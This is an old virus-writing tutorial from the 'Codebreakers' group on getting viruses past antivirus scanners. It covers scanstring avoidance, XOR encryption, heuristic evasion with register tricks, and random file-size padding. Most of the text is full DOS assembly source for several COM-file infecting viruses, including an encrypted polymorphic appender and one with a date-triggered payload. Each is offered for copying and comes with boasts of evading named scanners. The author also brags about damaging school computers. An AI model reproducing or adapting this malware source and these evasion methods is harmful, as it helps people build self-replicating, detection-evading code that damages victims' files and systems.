*** AVOIDING DETECTION **** By Arsonic[Codebreakers] The best thrill u get from a virus is not destroying someones computer, and causing massive mayham.. but the thrill u get from knowing that your virus has made it to the wild.. that your virus is not detectable by some of the most famous virus scanners on the face of the planet. and as these scanners get more and more sophisicated.. the need for better and newer ways to remain undetectable increases. The Following article deals with very basic ways (yet they work) for your virus's to get past scanners. ScanStrings A virus scanners search executables for scanstrings which are about four plus bytes of uncommon code that will not be used in any normal programs. So your virus's should use the most common code as possible. Also its unwise to leave strings such as *.com and *.exe unencrypted you could change these strings abit so they would not be scanstrings.. such as *.com becomes *.c* and *.exe becomes *.e* Encryption Encryption is a great way for a virus to hide itself from scanners and it also minimizes the number of bytes a av person has to get a scanstring from. Encryption Routines can be simple such as xor, or very complex. -----------------------CUT HERE--------------------------------------------- start_of_xor: ;start of the virus lea si,encryption_start ;si points to the start of the encrypted area mov di,si mov cx,end - encryption_start ;total number of bytes in the encrypted area call encryption ;call the encryption routine jmp encrption_start ;and goto the encrypted area encryption: ;our encryption routine lodsb ;load a byte into al xor al,byte ptr[decrypt] ;xor the byte in al with the value from decrypt stosb ;put the byte back loop encryption ;and do it again until cx = 0 ret ;return from call decrypt db 0 ;our value in which to decrypt with encryption_start: ;start of encrypted area.. ;everything passed here is encrypted mov ah,4eh ;Dos Function 4eh (find first file) lea dx,filemask ;the type of files to find (*.com) find_next: ;label used for find next.. (saves bytes) int 21h jnc infect ;if file found.. then infect it jmp close ;else we close infect: ;start of the infect routine mov ax,3d02h ;Dos Function 3d02 (openfile) mov dx,9eh ;9eh is where the filename is in the dta int 21h xchg bx,ax ;put the file handle into bx in al,40h ;get random value from system clock into al mov byte ptr [decrypt],al ;and save it as our new decrypt key mov ah,40h ;Dos Function 40 (Write to File) lea dx,start_of_xor ;start of the virus mov cx,encryption_start - start_of_xor ;total bytes to write int 21h lea si,encryption_start ;si points to the start of the encrypted area mov di,end_of_xor ;di points to end of the encrypted area / virus mov cx,end_of_xor - encryption_start ;cx = the total number of bytes to encrypt call encryption ;call the encryption routine mov ah,40h ;Dos Function 40 (Write to File) lea dx,encryption_start ;starting at start of encrypted area mov cx,end_of_xor - encryption_start ;cx = total number of bytes in the encrypted area int 21h mov ah,3eh ;Dos Function 3e (Close File) int 21h mov ah,4fh ;Dos Function 4f (Find Next File) jmp find_next close: int 20h ;return control to dos filemask db '*.com',0 ;filetype to infect Virus db 'Xor Example',0 ;virus name end_of_xor: -------------------END OF CUT----------------------------------------------- Screwing Up Heristics Heuristics are what a virus scanner uses to detect "virus like" code. so you are not just finding and changing scanstrings nowadays when a scanner detects your code. a quick, nice and simple way to make it past heuristics is to add a value unto the register.. example: mov ah,3eh ;right now its Dos Function 3e (Close File) add ah,2 ;add 2 to ah.. so it becomes.. 40 (write to file) u could also put the value into another register first, add 2 to it, and then mov that value to the register needed for the function.. mov al,3eh ;what this does is exsentually the same thing. but add al,2 ;uses another register.. adds 2, and then switches it to the xchg ah,al ;right register. ----------- Cut Here ---------------------------------------------------- ; heres is a stupid little overwriter i wrote while i was attempting to write ; a unencrypted virus not yet detectable by any scanner. the code is fairly ; simple. For every Ah needed in the virus.. the value minus to is put into ; al, and a call to a routine that adds 2 to al and then switches it with ; ah. ; ; Stats: AVP NOPE ; FPROT NOPE ; TBAV NOPE ; Start_Of_Virus: Find_First: mov al,4ch call Increase_Al Find_Next: lea dx,Filemask int 21h jnc Infect jmp Close Infect: mov ax,3d02h mov dx,9eh int 21h xchg bx,ax mov al,3eh lea dx,Start_Of_Virus mov cx,End_Of_Virus - Start_Of_Virus call Increase_Al int 21h mov al,3ch call Increase_Al int 21h mov al,4dh call Increase_Al jmp Find_Next Increase_Al: add al,2 xchg al,ah ret Close: ret FileMask db '*.c*',0 ;if *.com was used it would be detected! Virus db 'Fuck The Police!',0 Author db 'Arsonic',0 End_Of_Virus: -------------------- Dont Cut Past Here ---------------------------------- heres another little trick.. which surely can be improved since it is detected as Suspicous by F-Prot. All this is, is to call a routine to do int 21h and then return. example: mov ah,9h ;Dos Function 9 (display string to screen) lea dx,message ;dx = bytes to write to screen call int_21h ;call the routine to do a int 21h int 20h ;return control to dos message db 'Arsonic + XHiltar',13,10,'$' ;message to write to screen int_21h: ;our little int_21h routine int 21h ;all we do is a int 21h ret ;and return ----------------------- Cut Here ------------------------------------------ start: mov ah,4eh ;dos function 4e (find first file) lea dx,filemask ;dx = type of file to find call int_21h ;call the int_21h routine jnc infect ;one found.. then infect jmp close ;else close infect: mov ax,3d02h ;open file mov dx,9eh ;location of filename in dta call int_21h ;call the int_21h routine xchg bx,ax ;put the filehandle into bx mov ah,40h ;dos function 40 (write to file) lea dx,start ;starting at start mov cx,end - start ;cx = total number of bytes to write.. from end - start call int_21h ;call our int_21h routine mov ah,3eh ;dos function 3e (close file) call int_21h ;call our int_21h routine int 20h ;return control to dos int_21h: ;int_21h routine int 21h ;do a int 21h ret ;and return filemask db '*.c*',0 ;file extension to find virus db 'Int 21h Trick' end: ------------------- Hey FUCKHEAD DONT CUT PASTE HERE! ---------------------- Random Filesize Increase Alright.. so we've covered alot on hiding your virus from av programs.. but what about the user?. time/date restoration and attribute restoration are kickass.. because if u look at one directory and see all the exes, coms whatever have the same time and date your gonna get suspicous. Also filesize increases might be spotted by users. This little Routine will give your virus a totally random filesize, and might even confuse some stupid people.. its pretty simple.. all we do is 1) set file pointer to EOF (end of file) 2) write some garbage bytes 3) get a random value from system clock 4) compare it and see if it is time to quit Size_Increase: mov ax,4202h ;Dos Function 4202 (set filepointer to end of file) xor cx,cx xor dx,dx int 21h mov ah,40h ;Dos Function 40 (write to file) lea dx,write_byte ;dx = write_byte mov cx,3 ;we are writing 3 bytes int 21h in al,40h ;get value into al and al,10 ;not greater then 10 cmp al,5 ;compare al to 5 je Close_File ;if its equal .. its time to exit jmp Size_Increase ;else we do it all over again write_byte db 'ARS' ;the 3 bytes we write to the end -------------- Start of Cut ---------------------------------------------- Start: mov ah,4eh Find_Next: lea dx,Filemask int 21h jnc Infect jmp Close Infect: mov ax,3d02h mov dx,9eh int 21h xchg bx,ax mov ah,40h lea dx,Start mov cx,End - Start int 21h Meta_Morph: mov ax,4202h xor cx,cx xor dx,dx int 21h mov ah,40h lea dx,writebyte mov cx,1 int 21h in al,40h and al,7 cmp al,6 jne Meta_Morph jmp Close_File Close_File: mov ah,3eh int 21h mov ah,4fh jmp Find_Next Close: int 20h writebyte db 'a' filemask db '*.com',0 Virus db 'I love Lisa' Author db 'Arsonic' End: ------------------ If your cutting past here.. youve gone too far---------- ok.. thats like it for this tutorial.. below are two of my other virus's just because..eh. yeah. alright fine. WHATEVER Greetz to: Spooky -Tha Porn King Opic -Tha Man! Sea4 -Tha Cop Killer HT -Future Editor For The NewYork Times Aperson -if u want crack.. call him. (also heroin!) Saaweetie -watch it for she will send ya a batch file! Groucho -get better man :( XHILTAR -I LOVE U LISA!!!!!!!! Fuck-Yous to: My Computer Teachers -The Dumbass's Pulled Drained all the schools cpu batterys cause they thought elvira infected the CMOS! .. haha and as we speak the servers are being rebuilt. Thats what they get for having a outdated virus scanner i guess. Cutie Pie -Hey.. U got your windows back up yet? .. hey.. i think saaweetie has a batch file to fix that!!!!! CRASH! haha! -------------------Start Ripping Here------------------------------------- ; Virus: The Undressed Virus ; Author: Arsonic[Codebreakers] ; Type: Appending ; Encryption: No ; ; Displays a Message on Feb 5th. ; Btw.. I Love Lisa..! ;------------------------------------------------------------------------ ; AV-Product | Detected? | Comments ;------------------------------------------------------------------------ ; F-Prot | No | Easy to Get Past.. FPROT SUCKS! ; TBAV | Unknown Virus | Well.. at least it aint say VCL! ; AVP | VCL.824 | VCL! ARRGGGHH! ;------------------------------------------------------------------------ db 0e9h,0,0 start: call delta delta: pop bp sub bp,offset delta mov cx,0ffffh ;kill heristics fprot_loopy: jmp back mov ax,4c00h int 21h back: loop fprot_loopy mov cx,3 nop mov di,100h nop lea si,[bp+buffer] nop rep movsb find_first: mov ah,4ch add ah,2 nop find_next: nop lea dx,[bp+filemask] nop int 21h jnc infect jmp check_payload infect: mov ax,3d02h mov dx,9eh int 21h xchg ax,bx mov ah,3dh add ah,2 mov cx,3 lea dx,[bp+buffer] int 21h mov ax,word ptr[80h + 1ah] nop sub ax,end - start + 3 nop cmp ax,word ptr[bp+buffer+1] nop je close_file mov ax,word ptr[80h + 1ah] nop sub ax,3 nop mov word ptr[bp+three+1],ax mov ax,4200h xor cx,cx cwd int 21h mov ah,3eh add ah,2 nop lea dx,[bp+three] nop mov cx,3 nop int 21h mov ax,4202h xor cx,cx cwd int 21h mov ah,3eh add ah,2 nop lea dx,[bp+start] nop mov cx,end - start nop int 21h close_file: mov ah,3ch add ah,2 int 21h mov ah,4dh add ah,2 jmp find_next check_payload: mov ah,2ah int 21h cmp dh,2 ;is it febuary? je next jmp close next: cmp dl,5 ;the 5th? je payload ;yes.. display the message jmp close ;no.. return control to the program. payload: mov ah,9h ;display message lea dx,[bp+message] int 21h int 00h ;get keypress int 16h int 20h ;return to dos. close: mov di,100h ;return control to program jmp di three db 0e9h,0,0 filemask db '*.co*',0 ;if *.com it would be detected as trival variant buffer db 0cdh,20h,0 virus db 'The UnDreSSeD',0 ; messages to give those av'ers a author db 'Arsonic[CB]',0 ; nice scan string.. message db 'Happy Birthday Lisa!',10,13,'$' Lisa db 'I LOVE U LISA!',0 end: --------- STOP DA FUCKING CUTTING NOW ------------------------------------ --------- START IT AGAIN! ahhhhhhhhhhhhhhhhhhhh -------------------------- ; The Xhiltar Virus ; By Arsonic[Codebreakers] ; Type: Runtime Appending Com Infector ; Encrypted: Yes ; Polymorphic: Yes ; Time/Date: Yes ; add Attrib: Yes ; Changes Directory's: Yes (dotdot method) ; Anti-Anti-Virus: Yes (anti-heristics) db 0e9h,0,0 start: call delta delta: pop bp sub bp,offset delta mov cx,0ffffh ;fuck up those heristics! fprot_loopy: jmp back mov ax,4c00h int 21h back: loop fprot_loopy lea si,[bp+hidden_start] mov di,si mov cx,end - hidden_start call encryption jmp hidden_start value db 0 encryption: ;encryption routine call poly encrypt: lodsb ;1 _1stDummy: nop ;1 = +1 xor al,byte ptr[bp+value] ;4 _2ndDummy: nop ;1 = +6 stosb ;1 _3rdDummy: nop ;1 = +8 loop encrypt ;2 _4thDummy: nop ;1 = +11 ret hidden_start: mov cx,3 mov di,100h ;restore the first 3 bytes lea si,[bp+buff] rep movsb find_first: ;find first file mov ah,4eh find_next: lea dx,[bp+filemask] xor cx,cx ;with 0 attrib's.. int 21h jnc infect close: push 100h ret infect: mov ax,3d02h ;open file mov dx,9eh int 21h xchg bx,ax mov ax,5700h ;get time/date int 21h push dx ;save the values push cx in al,40h ;get new encrypt value from system clock mov byte ptr [bp+value],al mov ah,3fh ;read 3 bytes from the file.. too mov cx,3 ;be replaced with a jump to the virus lea dx,[bp+buff] int 21h mov ax,word ptr [80h + 1ah] ;check for infect sub ax,end - start + 3 cmp ax,word ptr[bp+buff+1] je close_file mov ax,word ptr[80h + 1ah] sub ax,3 mov word ptr[bp+three+1],ax mov ax,4200h ;goto start of file xor cx,cx xor dx,dx int 21h mov ah,40h ;write the 3 byte jump lea dx,[bp+three] mov cx,3 int 21h mov ax,4202h ;goto end of file xor cx,cx xor dx,dx int 21h mov ah,40h ;write the unencrypted area lea dx,[bp+start] mov cx,hidden_start - start int 21h lea si,[bp+hidden_start] ;encrypt the virus lea di,[bp+end] mov cx,end - hidden_start call encryption mov ah,40h ;write encrypted area lea dx,[bp+end] mov cx,end - hidden_start int 21h close_file: mov ax,5701h ;restore time/date pop cx ;with saved values pop dx int 21h mov ah,3eh ;close file int 21h mov ah,4Fh ;find next file jmp find_next poly: call random ;get random value mov [bp+_1stDummy],dl ;write random do-nothing call to encrypt call random mov [bp+_2ndDummy],dl call random mov [bp+_3rdDummy],dl call random mov [bp+_4thDummy],dl ret garbage: nop ; no operation instruction clc ; Clear Carry stc ; Set Carry sti ; Set Interuppt Flag cld ; Clear Direction Flag cbw ; Convert byte to word inc dx ; increase dx dec dx ; decrease dx lahf ; loads AH with flags random: in ax,40h and ax,7 xchg bx,ax add bx,offset garbage add bx,bp mov dl,[bx] ret filemask db '*.com',0 three db 0e9h,0,0 buff db 0cdh,20h,0 dotdot db '..',0 author db 'Arsonic[Codebreakers]',13,10,'$' virus db 'the XHiLTAR virus',13,10,'$' db 'I LOVE U LISA',13,10,'$' db 'I LOVE U SOOOO MUCH!',13,10,'$' end: ---------------------- End of All of it ----------------------------------- Laters Y'all Arsonic [Codebreakers]